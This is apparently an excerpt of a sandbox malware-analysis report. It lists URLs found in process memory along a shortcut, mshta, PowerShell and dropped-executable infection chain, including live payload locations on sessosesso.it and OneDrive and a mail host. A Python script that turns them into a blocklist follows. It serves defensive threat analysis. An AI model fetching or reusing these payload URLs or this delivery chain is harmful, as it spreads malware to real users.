Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000011.00000002.1634145596.0000029E324B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: svchost.exe, 0000000E.00000002.2531370506.0000021C38E00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: svchost.exe, 0000000E.00000003.1320362193.0000021C38C80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mail.irmaklarpaslanmaz.com.tr
Source: powershell.exe, 0000000F.00000002.1813302246.000002B010082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1813302246.000002B0101B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0o
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 0000000F.00000002.1678474741.000002B000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A051000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.1839645117.000002B07C378000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.o
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: uc.exe, uc.exe, 00000013.00000002.1514685918.0000000014B20000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1438376010.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000000.1494201950.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif, 00000019.00000000.1623023662.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif, 0000001B.00000000.1707510490.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif.19.dr String found in binary or memory: http://www.pmail.com
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 0000000F.00000002.1678474741.000002B000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A051000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 0000000E.00000003.1320362193.0000021C38CD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000000E.00000003.1320362193.0000021C38C80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.1678474741.000002B0011BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://live.com/
Source: powershell.exe, 0000000F.00000002.1813302246.000002B010082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1813302246.000002B0101B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: uc.exe, 00000013.00000002.1496845420.00000000007AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/_
Source: uc.exe, 00000013.00000002.1500694013.00000000025ED000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/downlo
Source: uc.exe, 00000013.00000002.1500694013.00000000025D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/download?resid=849ABDB14CA5CEC3%21220&authkey=
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A4D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sessosesso.it
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A4D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sessosesso.it/assets/aw/Book1.xlsx
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it
Source: mshta.exe, 00000009.00000002.1863478690.0000019AC1727000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1724000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/Book1.xlsx
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/uc.exep
Source: mshta.exe, 00000009.00000002.1865747161.000001A2C9C00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta
Source: mshta.exe, 00000009.00000002.1864667684.000001A2C42A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta...
Source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta...-
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta1
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta5
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta6288
Source: FT. 40FE CNY .xlsx.lnk String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaAC:
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC1680000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaC:
Source: mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaDe
Source: mshta.exe, 00000009.00000002.1863790955.0000019AC1850000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaH
Source: mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaLMEMX
Source: mshta.exe, 00000009.00000002.1863884931.0000019AC19B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaPS_BROW
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaU
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta_
Source: mshta.exe, 00000009.00000003.1859449128.000001A2C48C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htahttps://www.sessosesso.it/assets/aw/yt.hta
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC170A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaindows
Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zyupsq.by.files.1drv.com/
Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zyupsq.by.files.1drv.com/y4mZWAAbbWbD2Z_SLbFHXttkWK-AZlqt62tunxr4xpHZuH07d5XHa5kbVXE61GY17Y2
Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zyupsq.by.files.1drv.com/y4meSWi_sxRIVEad6REzmio40CREEc5i8wX7nys_a0wT5VjuHcwzIZewYF7haE8C4Cu
Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zyupsq.by.files.1drv.com:443/y4mZWAAbbWbD2Z_SLbFHXttkWK-AZlqt62tunxr4xpHZuH07d5XHa5kbVXE61GY
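The string hits above are carved from process memory, so a URL often runs into whatever bytes followed it (yt.htaAC:, yt.hta6288, uc.exep) or is cut short (onedrive.live.com/downlo). The following is an added example, not part of the Joe Sandbox report, that turns a handful of those report lines (copied here, not the complete list) into a deduplicated indicator list: it cuts each carved URL after the first recognised file extension, drops any URL that is merely a prefix of a longer one on the same host, and records which processes referenced it.

```python
"""Collapse URL strings carved from process memory into a clean indicator list.
Added example for this report; REPORT_LINES are a few lines copied from the
'String found in binary or memory' list above, not the full set."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

REPORT_LINES = [
    "Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta6288",
    "Source: mshta.exe, 00000009.00000002.1863884931.0000019AC19B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaPS_BROW",
    "Source: mshta.exe, 00000009.00000003.1859449128.000001A2C48C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htahttps://www.sessosesso.it/assets/aw/yt.hta",
    "Source: FT. 40FE CNY .xlsx.lnk String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaAC:",
    "Source: mshta.exe, 00000009.00000002.1863478690.0000019AC1727000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/",
    "Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/uc.exep",
    "Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A557000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sessosesso.it/assets/aw/Book1.xlsx",
    "Source: uc.exe, 00000013.00000002.1500694013.00000000025ED000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/downlo",
    "Source: uc.exe, 00000013.00000002.1500694013.00000000025D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/download?resid=849ABDB14CA5CEC3%21220&authkey=",
]

LINE_RE = re.compile(r"^Source: (.+?) String found in binary or memory: (\S+)$")
# A carved string runs into the bytes that follow it, so a URL ending in a file name
# is cut right after the first recognised extension ("yt.htaAC:" -> "yt.hta").
EXT_CUT = re.compile(
    r"^(https?://.*?\.(?:hta|exe|xlsx|xls|docx|doc|pdf|zip|js|vbs|ps1|bat|txt|html|htm))", re.I)

def normalize(url):
    m = EXT_CUT.match(url)
    return m.group(1) if m else url

def collect(lines):
    """Return {url: sorted process names}. Carve noise is stripped, and a URL that is
    a strict prefix of a longer URL on the same host is dropped as a truncated carve."""
    seen = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        source, url = m.groups()
        process = source.split(",")[0].strip()   # "mshta.exe, 00000009..." -> "mshta.exe"
        seen[normalize(url)].add(process)
    urls = list(seen)
    keep = {}
    for u in urls:
        shadowed = any(v != u and v.startswith(u) and
                       urlsplit(v).netloc == urlsplit(u).netloc for v in urls)
        if not shadowed:
            keep[u] = sorted(seen[u])
    return keep

def by_host(indicators):
    """Group the cleaned URLs per host for a blocklist or hunting query."""
    hosts = defaultdict(list)
    for url in sorted(indicators):
        hosts[urlsplit(url).netloc].append(url)
    return dict(hosts)

if __name__ == "__main__":
    for host, urls in by_host(collect(REPORT_LINES)).items():
        print(host)
        for u in urls:
            print("  ", u)
```

The prefix rule deliberately removes https://www.sessosesso.it/ once a deeper path on that host survives; the host itself is still recoverable from by_host(). Extension cutting is a heuristic: a URL whose path legitimately continues after ".exe" or ".hta" would be truncated, so review the output before it goes into a blocklist.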
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
